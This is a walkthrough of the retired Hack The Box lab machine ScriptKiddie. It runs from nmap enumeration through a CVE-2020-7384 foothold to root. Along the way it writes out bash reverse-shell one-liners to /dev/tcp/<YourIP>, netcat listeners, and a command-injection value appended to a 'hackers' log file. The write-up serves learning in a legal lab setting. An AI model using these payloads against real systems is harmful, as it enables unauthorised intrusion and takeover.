ScriptKiddie Walkthrough

Harith Dilshan -

After all ScriptKiddie has been retired, So I'm here for the ScriptKiddies πŸ˜‰πŸ˜‰

As it is implied in the name of the machine, it's kinda like CTF. Also in the machine's matrix on the statistics page will give the characteristics.

The overall experience is so good. Here I explain how to use CVE-2020-7384 exploit without tackling with Metasploit Framework. PrivEsc is so simple if you can understand the shell codes. Hope you will like it. 😊😊

Enough talks, πŸ₯± Let’s Get It Started πŸ±β€πŸ’»

Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! πŸ±β€πŸ‘€

01 Enumeration

First of all I will check the status of my VPN connection and whether machine is alive or not. To do that we can simply ping to the IP address like this πŸ‘‡πŸ‘‡

As you can see here, the TTL value is 63. That implies this machine is Linux.

As usual, let's begin with Nmap. First of all I need to know what ports are open, so run fast scan for all TCP ports.

nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.226

Here is the output πŸ‘‡πŸ‘‡

So, there are only two open ports. πŸ€”πŸ€”

01.1 Run Nmap Scripting Engine

To get the best result, we can run the Nmap Scripting Engine for all open ports. Now we know all of the open ports and therefore, we can point out and run the script engine as fast as possible.

nmap -sV -sC -oN DetailPorts.nmap -p 22,5000 10.10.10.226

Here is the output. πŸ‘‡πŸ‘‡

By looking at the SSH service info we can definitely say that the Operating System is Ubuntu and launchpad information gives us the flavor is Focal Fossa. Kind of cute ah!πŸ˜‰πŸ˜‰

You can search known exploits for SSH but trust me nothing can be found!.

Now we have only one port left and it is 5000/tcp. As in the Nmap results, that port is running a web server called Werkzeug.

Werkzeug is a comprehensive WSGI web application library. It began as a simple collection of various utilities for WSGI applications and has become one of the most advanced WSGI utility libraries. source

Since it is a webserver, let's browse using Firefox. You are free to use your own fav browser. But remember! sometimes we need to intercept the web traffic. I have already configured Firefox browser with burp certificate. That's why I'm using Firefox 🦊🦊

Open web browser and navigate to http://10.10.10.226:5000/

By looking at the interface, we realize that certainly we have plenty of enumerations here. Isn't that so mate?? πŸ€¦β€β™‚οΈπŸ€¦β€β™‚οΈ

After doing a number of enumerations, (LFI,SSRF,RCE etc..) I found the Foothold. 🀠🀠

02. Foothold | With out using MSF

Now we have the gun. Let's load it and shoot πŸ”«

I neglected to mention what is that vulnerability. Therefore, let me introduce the CVE-2020-7384 πŸŽ‡πŸŽ‡ Actually that vulnerability works on the Metasploit's msfvenom payload generator. Here is a small description of the vulnerability from Rapid7

But we are not playing here with metasploit. Let's do it manually ok?? πŸ¦½πŸ˜‰

Here is the POC code for the vularability. πŸ‘‡πŸ‘‡

justinsteven/advisories
Contribute to justinsteven/advisories development by creating an account on GitHub.
GitHubjustinsteven

First go the POC section and copy that to a file in our host machine.

After that, read the POC line by line. It is written in python3 and you are not a kiddie right? Read the code line by line, understand it and come back.

The code contains the payload section itself. We only have to replace that payload. See how cheap it is?

Now it's time to load the gun. Simply says, time to create the payload. Since we need a reverse shell I will go and create the bash reverse shell to replace the payload section. Follow the code line below πŸ‘‡πŸ‘‡

/bin/bash -c \"/bin/bash -i >& /dev/tcp/<YourIP>/4545 0>&1\"

Final exploit will look like this.πŸ‘‡πŸ‘‡ Please note to replace YourIP as yours.

πŸ“’πŸ“’ Let me introduce my Reverse shell generator for HTB. Click here to check how awful it is.

Is everything fine?? Let's compile the code. I will use python3 because the code was written in python3. 😜😜

python3 exploit.py

Here we have our loaded weapon. πŸ”«πŸ”«

After you run the exploit, usually the payload APK file will be stored in /tmp directory. I copied it to the Download directory because, it will be easy for me to browse and select the file. I don't know what is your fav directory so go and copy that f*#$ing APK file to whatever directory you want. 😠😠

Also, don't forget to power up netcat listener.😁😁

nc -lvnp 4545

Now go to the web browser again and go to the payload section too.

After doing all the above things, click generate button. Are you listening trough netcat my mate? Look what we got.

03. Privilege Escalation

First of all I search around .ssh directory. And it has only authorized_keys left which means you can create SSH key pair using ssh-keygen , then upload the public key to the authorized_keys file. And then you can use SSH to login as user kid by using your private key. But I'm not going to do it here. 😁😁😁

After doing some enumerations I found a fancy script called scanlosers.sh in /home/pwn directory and it is also owned by the user pwn. By looking at the permission on the file, definitely we can't write anything to that file too.

Let's open that file.

By analyzing the script and debugging the code line by line, (Actually here I copied that scanlosers.sh file to my host machine and also created the hackers file in my local system. Then I tried to take the advantage using hackers file. Because in this scenario we can write things only to hackers file) I found the exact way to get reverse shell as the user pwn . Now go and check the file permission on hackers file. You'll see that we can write anything to that file.

So here is my payload.πŸ‘‡πŸΏπŸ‘‡πŸΏ

echo "h4rithd  ;/bin/bash -c 'bash -i >& /dev/tcp/<YourIP>/7878 0>&1' #" >> /home/kid/logs/hackers

Please note that you must give a double space between h4rithd and ; mark. Again change YourIP as yours. Before going to execute that command, open a new terminal and start the netcat listener again on port 7878. 😎😎

 nc -lvnp 7878

After all, execute above payload and wait for the reverse shell. πŸ₯±πŸ₯±πŸ₯±

But mate, if you are in a busy environment, I mean, if so many users are using the box at the same time that you are using this, the payload won't work quickly. So... you'd better go, sip some coffeeβ˜• and try again afterwards

In a short time, we got reverse shell as user pwn . 😎😎😎 And if you are familiar in Privilege Escalation you already know what the next command is. Usually it is sudo -l

If you don't have enough knowledge on sudo commands, check explainshell.com It will explain every shell command in a pretty nice way. Here is for sudo -l

Nevertheless, we can simply say that we can use /opt/metasploit-framework-6.0.9/msfconsole with super user (sudo) permission without asking a password. πŸ˜‰πŸ˜‰ Let's try, type the following command and hit enter.

sudo /opt/metasploit-framework-6.0.9/msfconsole
sudo cat /root/root.txt

Wollah !!! We got the root flag. πŸ˜ŽπŸ˜ŽπŸ‘‘πŸ‘‘

Okay... I’ll see you on the next retired machine! Stay connected... πŸ™‹β€β™‚οΈπŸ™‹β€β™‚οΈ

Find me on @twitter